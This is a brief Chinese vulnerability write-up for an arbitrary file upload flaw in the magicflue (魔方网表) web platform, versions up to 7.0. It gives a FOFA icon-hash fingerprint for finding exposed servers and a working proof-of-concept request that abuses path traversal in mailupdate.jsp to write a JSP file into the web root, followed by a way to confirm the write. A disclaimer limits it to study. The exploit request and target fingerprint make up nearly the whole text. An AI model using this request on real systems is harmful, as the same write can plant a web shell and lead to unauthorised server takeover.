漏洞:
魔方网表 magicflue 任意文件上传漏洞
影响版本: magicflue magicflue <=v.7.0
fofa语法:
icon_hash="694014318"
验证poc:
直接在url处拼接即可
/magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=test123
检验:
访问url+/magicflu/test1.jsp
发现文件写入成功!
证明漏洞存在即可
声明:此篇文章只做技术分享,提供读者学习与交流,禁止做非法未授权渗透测试!